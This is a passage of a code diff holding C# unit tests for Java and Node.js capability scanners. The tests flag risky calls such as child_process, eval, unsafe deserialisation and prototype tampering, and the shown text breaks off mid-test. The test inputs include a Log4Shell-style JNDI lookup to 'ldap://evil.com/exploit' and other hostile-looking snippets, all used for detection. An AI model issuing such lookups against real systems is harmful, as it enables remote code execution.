const string code = @"method.setAccessible(true);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("setAccessible(true)", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsURLClassLoader()
{
const string code = @"URLClassLoader loader = new URLClassLoader(urls);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("URLClassLoader", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsDefineClass()
{
const string code = @"Class<?> clazz = loader.defineClass(name, bytes, 0, bytes.length);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("defineClass", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Native Code Patterns
[Fact]
public void ScanFile_DetectsSystemLoadLibrary()
{
const string code = @"System.loadLibrary(""mylib"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("System.loadLibrary", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSystemLoad()
{
const string code = @"System.load(""/path/to/libmylib.so"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("System.load", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNativeMethodDeclaration()
{
const string code = @"private native int doSomething(byte[] data);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("native method", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsUnsafeGetUnsafe()
{
const string code = @"Unsafe unsafe = Unsafe.getUnsafe();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("Unsafe.getUnsafe", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsUnsafeAllocateInstance()
{
const string code = @"Object obj = unsafe.allocateInstance(clazz);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("Unsafe.allocateInstance", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - JNDI Patterns (Log4Shell attack vector)
[Fact]
public void ScanFile_DetectsInitialContext()
{
const string code = @"InitialContext ctx = new InitialContext();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind); // JNDI is categorized as Other
Assert.Equal("InitialContext", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsInitialContextLookup()
{
const string code = @"Object obj = InitialContext.lookup(""java:comp/env/jdbc/mydb"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("InitialContext.lookup", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJndiRemoteLookup()
{
const string code = @"ctx.lookup(""ldap://evil.com/exploit"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Pattern == "JNDI remote lookup" && r.Risk == CapabilityRisk.Critical);
}
[Fact]
public void ScanFile_DetectsInitialLdapContext()
{
const string code = @"LdapContext ctx = new InitialLdapContext(env, null);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("InitialLdapContext", result[0].Pattern);
}
#endregion
#region JavaCapabilityEvidence Tests
[Fact]
public void Evidence_DeduplicationKey_IsCorrect()
{
var evidence = new JavaCapabilityEvidence(
CapabilityKind.Exec,
"Test.java",
10,
"Runtime.exec");
Assert.Equal("Exec|Test.java|10|Runtime.exec", evidence.DeduplicationKey);
}
[Fact]
public void Evidence_ConfidenceIsClamped()
{
var evidence1 = new JavaCapabilityEvidence(
CapabilityKind.Exec, "Test.java", 1, "pattern",
confidence: 2.0f);
var evidence2 = new JavaCapabilityEvidence(
CapabilityKind.Exec, "Test.java", 1, "pattern",
confidence: -1.0f);
Assert.Equal(1.0f, evidence1.Confidence);
Assert.Equal(0.0f, evidence2.Confidence);
}
[Fact]
public void Evidence_CreateMetadata_IncludesAllFields()
{
var evidence = new JavaCapabilityEvidence(
CapabilityKind.Exec,
"Test.java",
10,
"Runtime.exec",
snippet: "Runtime.getRuntime().exec(cmd);",
confidence: 0.95f,
risk: CapabilityRisk.Critical);
var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
Assert.Equal("exec", metadata["capability.kind"]);
Assert.Equal("Test.java:10", metadata["capability.source"]);
Assert.Equal("Runtime.exec", metadata["capability.pattern"]);
Assert.Equal("critical", metadata["capability.risk"]);
Assert.Equal("0.95", metadata["capability.confidence"]);
Assert.Contains("Runtime.getRuntime()", metadata["capability.snippet"]);
}
[Fact]
public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
{
var evidence = new JavaCapabilityEvidence(
CapabilityKind.Exec,
"Test.java",
10,
"Runtime.exec");
var langEvidence = evidence.ToLanguageEvidence();
Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
Assert.Equal("Test.java", langEvidence.Source);
Assert.Equal("line:10", langEvidence.Locator);
Assert.Equal("Exec:Runtime.exec", langEvidence.Value);
}
#endregion
}

883
src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Node.Tests/Internal/NodeCapabilityScannerTests.cs Normal file
View File

@@ -0,0 +1,883 @@
using StellaOps.Scanner.Analyzers.Lang.Node.Internal.Capabilities;
namespace StellaOps.Scanner.Analyzers.Lang.Node.Tests.Internal;
/// <summary>
/// Tests for <see cref="NodeCapabilityScanner"/>.
/// </summary>
public sealed class NodeCapabilityScannerTests
{
private const string TestFile = "test.js";
#region ScanFile - General Tests
[Fact]
public void ScanFile_NullContent_ReturnsEmpty()
{
var result = NodeCapabilityScanner.ScanFile(null!, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_EmptyContent_ReturnsEmpty()
{
var result = NodeCapabilityScanner.ScanFile("", TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_WhitespaceContent_ReturnsEmpty()
{
var result = NodeCapabilityScanner.ScanFile(" \n\t\n ", TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_NoPatterns_ReturnsEmpty()
{
const string code = @"
function hello() {
console.log('Hello, World!');
}
hello();";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_NormalizesBackslashesInPath()
{
const string code = @"const cp = require('child_process');";
var result = NodeCapabilityScanner.ScanFile(code, @"C:\src\test.js").ToList();
Assert.Single(result);
Assert.Equal("C:/src/test.js", result[0].SourceFile);
}
#endregion
#region ScanFile - Comment Stripping
[Fact]
public void ScanFile_IgnoresSingleLineComments()
{
const string code = @"
// const cp = require('child_process');
function test() { }";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresMultiLineComments()
{
const string code = @"
/*
const cp = require('child_process');
eval('code');
*/
function test() { }";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_DoesNotIgnoreCodeInStrings()
{
const string code = @"const msg = 'require(""child_process"")';";
// This should NOT match because it's a string literal
// The scanner should be smart about this
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
// Note: Current implementation may still detect patterns in strings
// This test documents expected behavior - may need adjustment based on implementation
}
#endregion
#region ScanFile - Exec Patterns (Critical)
[Fact]
public void ScanFile_DetectsRequireChildProcess()
{
const string code = @"const cp = require('child_process');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("require('child_process')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
Assert.Equal(1.0f, result[0].Confidence);
}
[Fact]
public void ScanFile_DetectsImportChildProcess()
{
const string code = @"import { exec } from 'child_process';";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.Exec);
}
[Fact]
public void ScanFile_DetectsChildProcessExec()
{
const string code = @"child_process.exec('ls -la', callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("child_process.exec", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsChildProcessExecSync()
{
const string code = @"const output = child_process.execSync('pwd');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("child_process.execSync", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsChildProcessSpawn()
{
const string code = @"const proc = child_process.spawn('node', ['app.js']);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("child_process.spawn", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsChildProcessFork()
{
const string code = @"const worker = child_process.fork('./worker.js');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("child_process.fork", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireExeca()
{
const string code = @"const execa = require('execa');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("require('execa')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequireShelljs()
{
const string code = @"const shell = require('shelljs');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("require('shelljs')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsProcessBinding()
{
const string code = @"const spawn = process.binding('spawn_sync');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("process.binding", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Filesystem Patterns
[Fact]
public void ScanFile_DetectsRequireFs()
{
const string code = @"const fs = require('fs');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("require('fs')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireFsPromises()
{
const string code = @"const fs = require('fs/promises');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("require('fs/promises')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFsReadFile()
{
const string code = @"fs.readFile('data.txt', callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.readFile", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFsWriteFile()
{
const string code = @"fs.writeFile('output.txt', data, callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.writeFile", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFsUnlink()
{
const string code = @"fs.unlink('file.txt', callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.unlink", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFsRm()
{
const string code = @"fs.rm('directory', { recursive: true }, callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.rm", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFsChmod()
{
const string code = @"fs.chmod('script.sh', 0o755, callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.chmod", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFsSymlink()
{
const string code = @"fs.symlink('target', 'link', callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.symlink", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Network Patterns
[Fact]
public void ScanFile_DetectsRequireNet()
{
const string code = @"const net = require('net');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("require('net')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequireHttp()
{
const string code = @"const http = require('http');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("require('http')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNetCreateServer()
{
const string code = @"const server = net.createServer(handler);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("net.createServer", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFetch()
{
const string code = @"const response = await fetch('https://api.example.com');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("fetch", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequireAxios()
{
const string code = @"const axios = require('axios');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("require('axios')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNewWebSocket()
{
const string code = @"const ws = new WebSocket('ws://localhost:8080');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("WebSocket", result[0].Pattern);
}
#endregion
#region ScanFile - Environment Patterns
[Fact]
public void ScanFile_DetectsProcessEnv()
{
const string code = @"const apiKey = process.env.API_KEY;";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.Environment);
}
[Fact]
public void ScanFile_DetectsProcessEnvBracket()
{
const string code = @"const value = process.env['MY_VAR'];";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.Environment);
}
[Fact]
public void ScanFile_DetectsRequireDotenv()
{
const string code = @"require('dotenv').config();";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("require('dotenv')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsProcessChdir()
{
const string code = @"process.chdir('/app');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("process.chdir", result[0].Pattern);
}
#endregion
#region ScanFile - Serialization Patterns
[Fact]
public void ScanFile_DetectsRequireNodeSerialize()
{
const string code = @"const serialize = require('node-serialize');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("require('node-serialize')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNodeSerializeUnserialize()
{
const string code = @"const obj = serialize.unserialize(data);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("node-serialize.unserialize", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsYamlLoad()
{
const string code = @"const config = yaml.load(yamlString);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("yaml.load", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsV8Deserialize()
{
const string code = @"const obj = v8.deserialize(buffer);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("v8.deserialize", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Crypto Patterns
[Fact]
public void ScanFile_DetectsRequireCrypto()
{
const string code = @"const crypto = require('crypto');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("require('crypto')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsCryptoCreateHash()
{
const string code = @"const hash = crypto.createHash('sha256');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("crypto.createHash", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsWeakHashAlgorithm()
{
const string code = @"const hash = crypto.createHash('md5');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Pattern == "Weak hash algorithm" && r.Risk == CapabilityRisk.High);
}
#endregion
#region ScanFile - Database Patterns
[Fact]
public void ScanFile_DetectsRequireMysql()
{
const string code = @"const mysql = require('mysql');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("require('mysql')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequirePg()
{
const string code = @"const { Pool } = require('pg');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("require('pg')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequireMongodb()
{
const string code = @"const { MongoClient } = require('mongodb');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("require('mongodb')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSqlStringConcatenation()
{
const string code = @"const sql = 'SELECT * FROM users WHERE id=' + id;";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("SQL string concatenation", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Dynamic Code Patterns (Critical)
[Fact]
public void ScanFile_DetectsEval()
{
const string code = @"const result = eval(userInput);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("eval", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNewFunction()
{
const string code = @"const fn = new Function('a', 'b', 'return a + b');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("new Function", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireVm()
{
const string code = @"const vm = require('vm');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("require('vm')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsVmRunInContext()
{
const string code = @"vm.runInContext(code, context);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("vm.runInContext", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsVmRunInNewContext()
{
const string code = @"vm.runInNewContext(code, sandbox);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("vm.runInNewContext", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSetTimeoutWithString()
{
const string code = @"setTimeout('alert(1)', 1000);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("setTimeout with string", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireVm2()
{
const string code = @"const { VM } = require('vm2');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("require('vm2')", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Reflection Patterns
[Fact]
public void ScanFile_DetectsNewProxy()
{
const string code = @"const proxy = new Proxy(target, handler);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("new Proxy", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsProtoAccess()
{
const string code = @"obj.__proto__ = malicious;";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("__proto__", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsObjectSetPrototypeOf()
{
const string code = @"Object.setPrototypeOf(obj, proto);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Object.setPrototypeOf", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsConstructorAccess()
{
const string code = @"obj.constructor('return this')();";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal(".constructor()", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Native Code Patterns
[Fact]
public void ScanFile_DetectsRequireNodeAddon()
{
const string code = @"const addon = require('./build/Release/addon.node');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("require('.node')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsProcessDlopen()
{
const string code = @"process.dlopen(module, filename);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("process.dlopen", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireFfiNapi()
{
const string code = @"const ffi = require('ffi-napi');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("require('ffi-napi')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsWebAssemblyInstantiate()
{
const string code = @"const instance = await WebAssembly.instantiate(wasmBuffer);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("WebAssembly.instantiate", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsWebAssemblyCompile()
{
const string code = @"const module = await WebAssembly.compile(wasmBuffer);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("WebAssembly.compile", result[0].Pattern);
}
#endregion
#region ScanFile - Other Patterns
[Fact]
public void ScanFile_DetectsRequireWorkerThreads()
{
const string code = @"const { Worker } = require('worker_threads');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("require('worker_threads')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsProcessKill()
{
const string code = @"process.kill(pid, 'SIGTERM');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("process.kill", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsDynamicRequire()
{
const string code = @"const mod = require(moduleName);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("require(variable)", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireInspector()
{
const string code = @"const inspector = require('inspector');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("require('inspector')", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region NodeCapabilityEvidence Tests
[Fact]
public void Evidence_DeduplicationKey_IsCorrect()
{
var evidence = new NodeCapabilityEvidence(
CapabilityKind.Exec,
"test.js",
10,
"child_process.exec");
Assert.Equal("Exec|test.js|10|child_process.exec", evidence.DeduplicationKey);
}
[Fact]
public void Evidence_ConfidenceIsClamped()
{
var evidence1 = new NodeCapabilityEvidence(
CapabilityKind.Exec, "test.js", 1, "pattern",
confidence: 2.0f);
var evidence2 = new NodeCapabilityEvidence(
CapabilityKind.Exec, "test.js", 1, "pattern",
confidence: -1.0f);
Assert.Equal(1.0f, evidence1.Confidence);
Assert.Equal(0.0f, evidence2.Confidence);
}
[Fact]
public void Evidence_CreateMetadata_IncludesAllFields()
{
var evidence = new NodeCapabilityEvidence(
CapabilityKind.DynamicCode,
"test.js",
10,
"eval",
snippet: "eval(userInput);",
confidence: 1.0f,
risk: CapabilityRisk.Critical);
var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
Assert.Equal("dynamiccode", metadata["capability.kind"]);
Assert.Equal("test.js:10", metadata["capability.source"]);
Assert.Equal("eval", metadata["capability.pattern"]);
Assert.Equal("critical", metadata["capability.risk"]);
Assert.Equal("1.00", metadata["capability.confidence"]);
Assert.Contains("eval", metadata["capability.snippet"]);
}
[Fact]
public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
{
var evidence = new NodeCapabilityEvidence(
CapabilityKind.Exec,
"test.js",
10,
"child_process.exec");
var langEvidence = evidence.ToLanguageEvidence();
